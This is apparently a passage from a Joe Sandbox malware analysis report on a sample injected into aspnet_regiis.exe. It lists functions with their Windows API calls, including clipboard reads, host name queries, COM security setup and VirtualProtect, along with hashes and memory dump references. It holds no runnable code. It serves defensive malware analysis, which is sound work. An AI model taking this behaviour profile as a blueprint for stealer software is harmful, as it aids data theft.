Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: I=[;$\]$k8i$sq$wu
API String ID: 0-747998150
Opcode ID: c5e3c36b73dc91c6915b55087ca9fa36f8b259037e104fab622fbfab396f25bb
Instruction ID: 8a428301c91352e71cbae1931f6b70cd726b0a3c6c1927ca5709d20799134232
Opcode Fuzzy Hash: c5e3c36b73dc91c6915b55087ca9fa36f8b259037e104fab622fbfab396f25bb
Instruction Fuzzy Hash: 40D1C9B0508340CFD7009FA9E89166BBBF4FF86754F148A2CF5958B251E778C909CB8A

Function 025A8C70 Relevance: 7.6, APIs: 5, Instructions: 148
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 025A8C92
GetCurrentThreadId.KERNEL32 ref: 025A8CA5
GetCurrentProcessId.KERNEL32 ref: 025A8CF8
GetForegroundWindow.USER32 ref: 025A8D9A
ExitProcess.KERNEL32 ref: 025A8E49

Memory Dump Source

Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: b694cfa602d50dc4b57ea083d14a5cd86c6de87cfe5b4a73bfe61080f21ebf33
Instruction ID: 0e3711285d65ca6cded806864fcb9980354ca8e071967567becfbf2681363752
Opcode Fuzzy Hash: b694cfa602d50dc4b57ea083d14a5cd86c6de87cfe5b4a73bfe61080f21ebf33
Instruction Fuzzy Hash: A6419E37B0031C5BD714ADB9DD6B39EBAC66BC4214F4A4428AE84DF391FDB98C0586C8

Function 025CE398 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 386
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

hzQ, xrefs: 025CEF9C
A0*#, xrefs: 025CEFA6
_mQ#, xrefs: 025CF148

Memory Dump Source

Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: hzQ$A0*#$_mQ#
API String ID: 0-649192675
Opcode ID: 270d81a0aa28390c8f75e97e39fba1fa8e47bcbd5d76d51cbf7403d394708f61
Instruction ID: a2707e1c75431ee8d1336938aafe75eafc1579a2281ca0eb4dc17440c335877d
Opcode Fuzzy Hash: 270d81a0aa28390c8f75e97e39fba1fa8e47bcbd5d76d51cbf7403d394708f61
Instruction Fuzzy Hash: 4ED1E771604B818FD729CF35C4A07A3BFE3AF96204F1889AEC4DB8B646D77964058B14

Function 025CEF87 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 317
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 025CF0AC

Strings

hzQ, xrefs: 025CEF9C
A0*#, xrefs: 025CEFA6
_mQ#, xrefs: 025CF148

Memory Dump Source

Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: hzQ$A0*#$_mQ#
API String ID: 3960555810-649192675
Opcode ID: ccff9a45c17a90b7f7666200b67252d975765c9eba45a75834f7f82c294336bf
Instruction ID: e6203ac5bdbb04df54f5c8bf1a8d1374e1eac701317c123fd6087df7f7167844
Opcode Fuzzy Hash: ccff9a45c17a90b7f7666200b67252d975765c9eba45a75834f7f82c294336bf
Instruction Fuzzy Hash: 85B1C571604B818FD739CF39C4617A3BBE2AF96204F18896EC0DB9B682D779A105CB54

Function 025CF3ED Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 451
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 025CF41E
GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 025CF51B

Strings

Y)|z, xrefs: 025CF608

Memory Dump Source

Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd

Similarity

API ID: ComputerName
String ID: Y)|z
API String ID: 3545744682-2475117699
Opcode ID: 9d086ecd03d51b26a53d73531764c80552642a5bd81f9849140140032493ea62
Instruction ID: 3da4a6b3bb7af4b38f18f1bb8af163fcb35aaddf141ed1f81e552018f261a5f5
Opcode Fuzzy Hash: 9d086ecd03d51b26a53d73531764c80552642a5bd81f9849140140032493ea62
Instruction Fuzzy Hash: E5E10A20605B818EE725CF39C4517B3BFE2AF57304F18995EC0EB8B682E779A109CB55

Function 025ADA8D Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 330
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 025ADAA2

Strings

~, xrefs: 025ADAB7

Memory Dump Source

Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd

Similarity

API ID: Uninitialize
String ID: ~
API String ID: 3861434553-1707062198
Opcode ID: 9aec6a69ca91bb839414fa67a90ec6a04043da2df9175eca71c9f0912757a1f2
Instruction ID: 93c763ff07c78c7e6a567f89c3986dba86fd67cfc6f560ff70e870374447407e
Opcode Fuzzy Hash: 9aec6a69ca91bb839414fa67a90ec6a04043da2df9175eca71c9f0912757a1f2
Instruction Fuzzy Hash: 9DB1207550E3D18AD334DF29C4A83ABBFE1AFD6308F18495CC4D95B242DB78850ACB96

Function 025DFAC0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(025DD9CC,?,00000004,?), ref: 025DFAEE

Memory Dump Source

Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 025DD1B0 Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?), ref: 025DD250

Memory Dump Source

Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 0c056f243609ada985b0d761c4726883afd19bdc6ef924204549baa5e675310f
Instruction ID: 7d7dd055c4887773f0ecf9ee28c7337bd1503fd05f56b0a6896ad52d42502196
Opcode Fuzzy Hash: 0c056f243609ada985b0d761c4726883afd19bdc6ef924204549baa5e675310f
Instruction Fuzzy Hash: 2E018932E4C150CBD71D1F38A82256B7B62FB86215F14167CC88297654C6354C25CB8A

Function 025AA020 Relevance: 1.6, APIs: 1, Instructions: 72libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(B11B8F15,00000000,03020900), ref: 025AA0EF

Memory Dump Source

Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f7cded78074576f754bfca32604026a241079bc214ba0c787ecbf0486ac56a30
Instruction ID: d5cd304ef8b6e716cf473303702b51771c485bddad526899f7aa64bfdb960f8c
Opcode Fuzzy Hash: f7cded78074576f754bfca32604026a241079bc214ba0c787ecbf0486ac56a30
Instruction Fuzzy Hash: 1411D23019D3908BC7149A20D8967AF7BE5FBEA308F18492DE0D55B641C7785509CB6A

Function 025D3E66 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 025D3EAD

Memory Dump Source

Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 71095753fd02128fc45c3c6d7ec24582f90635c5a24683e8fc01b13d17cbbe76
Instruction ID: 2f4c8bcebd989a616507556f79cf05ee2c675fc722107de1f74743b0e8c0fe66
Opcode Fuzzy Hash: 71095753fd02128fc45c3c6d7ec24582f90635c5a24683e8fc01b13d17cbbe76
Instruction Fuzzy Hash: D7F0F9746193418FD794DF14C1A875ABBE1BBC5308F04C91CE4888B384DBB5954CCF82

Function 025D25A0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 025D25E9

Memory Dump Source

Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 94b9598bd82df0e150278dbe8d011a32550bca0a2ef95de7cbc11fba42a39061
Instruction ID: 65543f8fc321d604edee3a041e1f37a21f20248411d0e8e37dee70a2100bba0f
Opcode Fuzzy Hash: 94b9598bd82df0e150278dbe8d011a32550bca0a2ef95de7cbc11fba42a39061
Instruction Fuzzy Hash: 4CF0B7B4509701CFD354DF28C1A8B1ABBF1FB89304F00880CE4998B3A0DB76A948DF82

Function 025AD2E3 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 025AD2F5

Memory Dump Source

Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 6a48b3b22d243f7413cfde5d2f5602854cf12aff4d1d9f25df35c698dd4d0f93
Instruction ID: 65b595abfd71eb33361c85d635a25b201e5e3fcb92a99dd31990237a5d76c0b6
Opcode Fuzzy Hash: 6a48b3b22d243f7413cfde5d2f5602854cf12aff4d1d9f25df35c698dd4d0f93
Instruction Fuzzy Hash: 10E01731BE5305A7FE684918EC0BF4422435384B21F3C8654B311FE6D8D9B8B515550C

Function 025AD2B0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 025AD2C3

Memory Dump Source

Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 874fc5aa000e1db8604b9ded9fddd23a139f90e569a37b25f7a7448ac9cb2480
Instruction ID: 75f3320885753ab0cd6067d38d789b933a98a83d094be0e5d61da35dab5e5875
Opcode Fuzzy Hash: 874fc5aa000e1db8604b9ded9fddd23a139f90e569a37b25f7a7448ac9cb2480
Instruction Fuzzy Hash: F2D09730DC0640EBC60C792DEC0FF1A362C9302328F800618F2A2CE1D2D840AD24E169

Non-executed Functions

Function 025D5300 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 129clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 025D5314
GetWindowLongW.USER32 ref: 025D5339
GetClipboardData.USER32 ref: 025D5349
GlobalLock.KERNEL32 ref: 025D5362
GlobalUnlock.KERNEL32 ref: 025D549A
CloseClipboard.USER32 ref: 025D54A3

Strings

T, xrefs: 025D53DC
F, xrefs: 025D53E6
[, xrefs: 025D53BE
E, xrefs: 025D53B9
C, xrefs: 025D53EB
J, xrefs: 025D53CD
M, xrefs: 025D53D7
_, xrefs: 025D53D2
C, xrefs: 025D53C3
^, xrefs: 025D53C8
x, xrefs: 025D53F0

Memory Dump Source

Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: C$C$E$F$J$M$T$[$^$_$x
API String ID: 2832541153-1009912999
Opcode ID: 7593a45ed8427623545b8f94f0f46bcf67a05fe1994d33ce5b98134b5b3ecf33
Instruction ID: 90572d356bd96469d42a77ceb6bf44de87d114c4d7e1e95e494dd8195a7639e4
Opcode Fuzzy Hash: 7593a45ed8427623545b8f94f0f46bcf67a05fe1994d33ce5b98134b5b3ecf33
Instruction Fuzzy Hash: F4419E7150C3818FD311AF7CD58831FBFE1AB91219F484D2DE5C58B282E6B98649CB9B

Function 025C9520 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 302COMMON

Download Yara Rule

Strings

57, xrefs: 025C9D81
,-, xrefs: 025C9EB8

Memory Dump Source

Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: ,-$57
API String ID: 0-1747932499
Opcode ID: 1f587422cc7ea1e68b7cb43863cb4b3b08812cea55cedcf5f1c869b9990b3b0b
Instruction ID: 263dd409794a4751e70d20b8cea41242557adffbfc7068f361e9946876b85b55
Opcode Fuzzy Hash: 1f587422cc7ea1e68b7cb43863cb4b3b08812cea55cedcf5f1c869b9990b3b0b
Instruction Fuzzy Hash: 09A1CBB5A08340DFD7209F25D89136BBBA2FF86358F444D2CE0C54B380E739850ACB9A

Function 025D45D3 Relevance: 43.9, APIs: 1, Strings: 24, Instructions: 159memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 025D4691

Strings

=, xrefs: 025D47BA
O, xrefs: 025D45F9
0, xrefs: 025D4929
I, xrefs: 025D45E9
q, xrefs: 025D46BA
, xrefs: 025D470A
1, xrefs: 025D47DA
a, xrefs: 025D46AA
h, xrefs: 025D471A
y, xrefs: 025D46EA
R, xrefs: 025D477A
., xrefs: 025D481A
-, xrefs: 025D480A
|, xrefs: 025D46CA
\, xrefs: 025D472A
M, xrefs: 025D4609
n, xrefs: 025D46FA
), xrefs: 025D47FA
<, xrefs: 025D479A
B, xrefs: 025D4611
C, xrefs: 025D4619
*, xrefs: 025D47EA
}, xrefs: 025D46DA
, xrefs: 025D47AA

Memory Dump Source

Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd

Similarity

API ID: AllocString
String ID: $ $)$*$-$.$0$1$<$=$B$C$I$M$O$R$\$a$h$n$q$y$|$}
API String ID: 2525500382-1673335896
Opcode ID: f800a039e44653c745ad5d5eba600119bd0165aefc3b2095efcdd9d4e06af0f6
Instruction ID: c7923cbcce6b5394bc26f3e866a092001eed417108dfb575c379cd1ed18d65db
Opcode Fuzzy Hash: f800a039e44653c745ad5d5eba600119bd0165aefc3b2095efcdd9d4e06af0f6
Instruction Fuzzy Hash: 8B91C66150C7C28EE3328A3C984879BBFD16BA3224F484A9ED5E94B2D3D7B54149C727

Function 025D406C Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 114COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 025D40B2

Strings

7, xrefs: 025D411C
?, xrefs: 025D40DC
-, xrefs: 025D4164
5, xrefs: 025D410C
1, xrefs: 025D40EC
4, xrefs: 025D4174
%, xrefs: 025D4184
8, xrefs: 025D4154
3, xrefs: 025D40FC
<, xrefs: 025D4134

Memory Dump Source

Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd

Similarity

API ID: InitVariant
String ID: %$-$1$3$4$5$7$8$<$?
API String ID: 1927566239-2306056897
Opcode ID: d5cf2b609c59ff1e182d66705f291cfadb7b13f587dee277aba12dcde361ab01
Instruction ID: bd8c7446d7617bf82594cac52aef47a4ebfa01cf253e5024a6ea98ab03dbf367
Opcode Fuzzy Hash: d5cf2b609c59ff1e182d66705f291cfadb7b13f587dee277aba12dcde361ab01
Instruction Fuzzy Hash: 85513C7050C7C18AD3398B3894997DEBFD16BA6314F084A6ED1E98B3D2C6B44645CB53

Function 025D39AC Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 025D39B6
VariantInit.OLEAUT32 ref: 025D39C9

Strings

m, xrefs: 025D3A13
!, xrefs: 025D3A3B
R, xrefs: 025D39FF
m, xrefs: 025D39EB
|, xrefs: 025D3A27
S, xrefs: 025D3A1D
], xrefs: 025D39F5
X, xrefs: 025D3A09
h, xrefs: 025D39E1

Memory Dump Source

Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd

Similarity

API ID: Variant$ClearInit
String ID: !$R$S$X$]$h$m$m$|
API String ID: 2610073882-107755797
Opcode ID: 76334d791f58a3a1d83d8252f5a2ed5bdbd5719ae5498a69bdfa01334f2af62e
Instruction ID: d5d64e7d78d3698c5fa8cbe991fdc35071e7b277986e551ab089e1a9fd8b603d
Opcode Fuzzy Hash: 76334d791f58a3a1d83d8252f5a2ed5bdbd5719ae5498a69bdfa01334f2af62e
Instruction Fuzzy Hash: 7141663110C7C18AD325CB78848879EFFD26BA6324F084A5DE5E10B3E6C7B98509CB63

Function 025D3F1A Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 80COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 025D3F24
VariantInit.OLEAUT32 ref: 025D3F37

Strings

S, xrefs: 025D3F8B
], xrefs: 025D3F63
!, xrefs: 025D3FA9
m, xrefs: 025D3F81
m, xrefs: 025D3F59
|, xrefs: 025D3F95
h, xrefs: 025D3F4F
X, xrefs: 025D3F77
R, xrefs: 025D3F6D

Memory Dump Source

Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd

Similarity

API ID: Variant$ClearInit
String ID: !$R$S$X$]$h$m$m$|
API String ID: 2610073882-107755797
Opcode ID: 9efb1a2dd90a13a0bfc7bdb090cce2e9c4772b7911e93cbd07e3a4bf123efe91
Instruction ID: 32dbcd91cf0f83bf23404287f5914861c4601463b196405a19ea5757f61da034
Opcode Fuzzy Hash: 9efb1a2dd90a13a0bfc7bdb090cce2e9c4772b7911e93cbd07e3a4bf123efe91
Instruction Fuzzy Hash: 8B41273050C7C18AD3258A7C948875EFFD26BD6324F484A5DE1E14B3E6D7B98509CB63

Analysis Process: mxtvcgq32fe.exePID: 6656, Parent PID: 7188COMMON

Execution Graph

Execution Coverage:	8.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 02811788 Relevance: 1.6, APIs: 1, Instructions: 94
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0281182F

Memory Dump Source

Source File: 0000001E.00000002.2220545121.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_2810000_mxtvcgq32fe.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 26d5927ece8423bda6b174dba79e926578299f84c399d4a495838f32d7fae26e
Instruction ID: 62f068e35a5a05caef1d400715701ab9bf2f9be6ef54f1dfc75924c2f0f0a0b3
Opcode Fuzzy Hash: 26d5927ece8423bda6b174dba79e926578299f84c399d4a495838f32d7fae26e
Instruction Fuzzy Hash: BE3199B9D042589FCB10CFA9D584ADEFBF5BB09310F14902AE818B7350D775A945CF64

Function 02819DD0 Relevance: 1.6, APIs: 1, Instructions: 94
memoryCOMMON

